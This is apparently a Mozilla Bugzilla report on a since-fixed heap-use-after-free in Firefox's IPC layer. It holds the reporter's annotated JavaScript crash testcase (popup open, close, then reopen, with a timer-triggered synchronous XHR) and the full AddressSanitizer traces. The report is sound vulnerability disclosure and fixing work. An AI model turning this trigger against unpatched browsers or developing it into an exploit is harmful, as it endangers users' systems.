Closed Bug 1378112 Opened 7 years ago Closed 7 years ago

heap-use-after-free in mozilla::layout::PRenderFrameChild::Send__delete__

Categories: Core :: IPC; Type: defect
Version: 56 Branch
Priority: Not set
Severity: critical

Tracking: RESOLVED FIXED
Tracking Status:
firefox-esr52 --- unaffected
firefox54 --- unaffected
firefox55 --- unaffected
firefox56 --- fixed

People: Reporter: nils; Unassigned; NeedInfo

Details: 5 keywords; Whiteboard: [post-critsmash-triage] fixed by bug 1378374

Attachments: 3 files

The following testcase crashes the latest ASAN build of Firefox (BuildID=20170703081455) when run in private mode (command line argument: -private).

<script>
// Reporter's testcase. The ordering matters: open a popup, arm a timer,
// close the popup, then open again. The second open() spins a nested event
// loop in ContentChild::ProvideWindowCommon; the timer fires inside it.
function start() {
        o17=window.top.open('data:text/html,<div>','popup10','height=1,innerWidth=-10,toolbar');
        window.top.setTimeout(fun0, 4);
        o17.close();  // schedules delayed TabChild teardown (DelayedDeleteRunnable in the free stack)
        o17.open('data:text/html,<div>','popup73','width=114694,top=323,outerHeight=285,menubar,personalbar,dependent,resizable');
}
function fun0() {
        // A synchronous XHR spins its own nested event loop
        // (XMLHttpRequestMainThread::SendInternal), which is where the delayed
        // delete runs and frees the PRenderFrameChild that the outer
        // ProvideWindowCommon still holds a pointer to.
        x = new window.XMLHttpRequest.prototype.constructor();
        x.open("POST","https://mozilla.org", false);
        x.send("test");
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==17569==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000136dd8 at pc 0x7f9d6a0669d4 bp 0x7ffc3a5c8a10 sp 0x7ffc3a5c8a08
READ of size 4 at 0x604000136dd8 thread T0 (Web Content)
    #0 0x7f9d6a0669d3 in Id /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/ProtocolUtils.h:177:33
    #1 0x7f9d6a0669d3 in mozilla::layout::PRenderFrameChild::Send__delete__(mozilla::layout::PRenderFrameChild*) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PRenderFrameChild.cpp:65
    #2 0x7f9d6ea81005 in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:986:5
    #3 0x7f9d6eaff4f0 in mozilla::dom::TabChild::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:1004:16
    #4 0x7f9d733eb550 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:879:24
    #5 0x7f9d733f060f in OpenWindow2 /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #6 0x7f9d733f060f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #7 0x7f9d6b74a85a in nsGlobalWindow::OpenInternal(nsAString const&, nsAString const&, nsAString const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13036:21
    #8 0x7f9d6b748f6f in OpenJS /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8924:10
    #9 0x7f9d6b748f6f in nsGlobalWindow::OpenOuter(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8886
    #10 0x7f9d6b7493fd in nsGlobalWindow::Open(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8895:3
    #11 0x7f9d6cc1fc22 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
    #12 0x7f9d6cc1e500 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15689:13
    #13 0x7f9d73945724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7f9d73945724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #15 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #16 0x7f9d7459624e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
    #17 0x7f9d7455a629 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
    #18 0x7f9d745763d3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
    #19 0x7f9d74578da7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
    #20 0x7f9d73945b6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #21 0x7f9d73945b6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #22 0x7f9d7392e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #23 0x7f9d7392e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #24 0x7f9d739152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #25 0x7f9d739458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #26 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #27 0x7f9d742bce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #28 0x7f9d6ceae555 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #29 0x7f9d6d8386fb in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #30 0x7f9d6d8386fb in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #31 0x7f9d6d8017b9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1142:51
    #32 0x7f9d6d803692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
    #33 0x7f9d6d7e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #34 0x7f9d6d7e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
    #35 0x7f9d6fa3e94f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7
    #36 0x7f9d7298df3a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7698:21
    #37 0x7f9d72989f98 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7496:7
    #38 0x7f9d7299150f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7393:13
    #39 0x7f9d6a918a22 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1299:3
    #40 0x7f9d6a917a1c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:860:14
    #41 0x7f9d6a914868 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:749:9
    #42 0x7f9d6a916732 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:631:5
    #43 0x7f9d6a91745c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:487:14
    #44 0x7f9d69006ce3 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #45 0x7f9d6ba67a9b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8922:18
    #46 0x7f9d6ba67662 in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8844:9
    #47 0x7f9d6ba41175 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5365:3
    #48 0x7f9d6bb03662 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1138:12
    #49 0x7f9d6bb03662 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1144
    #50 0x7f9d6bb03662 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1187
    #51 0x7f9d68e391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
    #52 0x7f9d68e65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
    #53 0x7f9d68e6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #54 0x7f9d69c4a1f1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #55 0x7f9d69ba6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #56 0x7f9d69ba6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #57 0x7f9d69ba6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #58 0x7f9d6f24ca6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #59 0x7f9d7347fa47 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #60 0x7f9d69ba6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #61 0x7f9d69ba6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #62 0x7f9d69ba6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #63 0x7f9d7347f4ad in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
    #64 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #65 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #66 0x7f9d85fda82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #67 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)

0x604000136dd8 is located 8 bytes inside of 40-byte region [0x604000136dd0,0x604000136df8)
freed by thread T0 (Web Content) here:
    #0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f9d6eb13dd5 in DeallocPRenderFrameChild /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2552:5
    #2 0x7f9d6eb13dd5 in non-virtual thunk to mozilla::dom::TabChild::DeallocPRenderFrameChild(mozilla::layout::PRenderFrameChild*) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2550
    #3 0x7f9d6a279f8a in mozilla::dom::PBrowserChild::DeallocSubtree() /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:5075:13
    #4 0x7f9d6a277865 in mozilla::dom::PBrowserChild::Send__delete__(mozilla::dom::PBrowserChild*) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:1935:14
    #5 0x7f9d6eb27278 in mozilla::dom::TabChild::DelayedDeleteRunnable::Run() /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:327:23
    #6 0x7f9d68e65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
    #7 0x7f9d68e6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #8 0x7f9d6f0adc95 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3088:31)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #9 0x7f9d6f0adc95 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3088
    #10 0x7f9d6f0cb846 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:379:13
    #11 0x7f9d6cce4156 in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:783:13
    #12 0x7f9d6d448b1e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3028:13
    #13 0x7f9d73945724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7f9d73945724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #15 0x7f9d7392e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #16 0x7f9d7392e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #17 0x7f9d739152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #18 0x7f9d739458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #19 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #20 0x7f9d742bce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #21 0x7f9d6cfea559 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #22 0x7f9d6b771e2c in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
    #23 0x7f9d6b771e2c in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13335
    #24 0x7f9d6b93b954 in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/dom/base/TimeoutManager.cpp:902:42
    #25 0x7f9d6b931110 in mozilla::dom::TimeoutExecutor::MaybeExecute() /home/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:167:11
    #26 0x7f9d6b931966 in Notify /home/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:235:5
    #27 0x7f9d6b931966 in non-virtual thunk to mozilla::dom::TimeoutExecutor::Notify(nsITimer*) /home/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:230
    #28 0x7f9d68e76f92 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:523:40
    #29 0x7f9d68e4120b in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11
    #30 0x7f9d68e53f75 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:191:22
    #31 0x7f9d68e53aff in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:75:15
    #32 0x7f9d68e391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
    #33 0x7f9d68e65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
    #34 0x7f9d68e6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #35 0x7f9d6ea7ffe1 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:969:24)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #36 0x7f9d6ea7ffe1 in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:969

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f9d6eb13ce0 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f9d6eb13ce0 in AllocPRenderFrameChild /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2546
    #4 0x7f9d6eb13ce0 in non-virtual thunk to mozilla::dom::TabChild::AllocPRenderFrameChild() /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2544
    #5 0x7f9d6a2644f5 in mozilla::dom::PBrowserChild::SendPRenderFrameConstructor() /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:193:40
    #6 0x7f9d6ea7f0f4 in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:855:46
    #7 0x7f9d6eaff4f0 in mozilla::dom::TabChild::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:1004:16
    #8 0x7f9d733eb550 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:879:24
    #9 0x7f9d733f060f in OpenWindow2 /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #10 0x7f9d733f060f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #11 0x7f9d6b74a85a in nsGlobalWindow::OpenInternal(nsAString const&, nsAString const&, nsAString const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13036:21
    #12 0x7f9d6b748f6f in OpenJS /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8924:10
    #13 0x7f9d6b748f6f in nsGlobalWindow::OpenOuter(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8886
    #14 0x7f9d6b7493fd in nsGlobalWindow::Open(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8895:3
    #15 0x7f9d6cc1fc22 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
    #16 0x7f9d6cc1e500 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15689:13
    #17 0x7f9d73945724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #18 0x7f9d73945724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #19 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #20 0x7f9d7459624e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
    #21 0x7f9d7455a629 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
    #22 0x7f9d745763d3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
    #23 0x7f9d74578da7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
    #24 0x7f9d73945b6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #25 0x7f9d73945b6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #26 0x7f9d7392e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #27 0x7f9d7392e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #28 0x7f9d739152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #29 0x7f9d739458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #30 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #31 0x7f9d742bce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #32 0x7f9d6ceae555 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #33 0x7f9d6d8386fb in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #34 0x7f9d6d8386fb in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #35 0x7f9d6d8017b9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1142:51
    #36 0x7f9d6d803692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
    #37 0x7f9d6d7e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/ProtocolUtils.h:177:33 in Id
Shadow bytes around the buggy address:
  0x0c088001ed60: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
  0x0c088001ed70: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
  0x0c088001ed80: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fd
  0x0c088001ed90: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
  0x0c088001eda0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
=>0x0c088001edb0: fa fa fd fd fd fd fd fd fa fa fd[fd]fd fd fd fa
  0x0c088001edc0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
  0x0c088001edd0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
  0x0c088001ede0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x0c088001edf0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c088001ee00: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fd
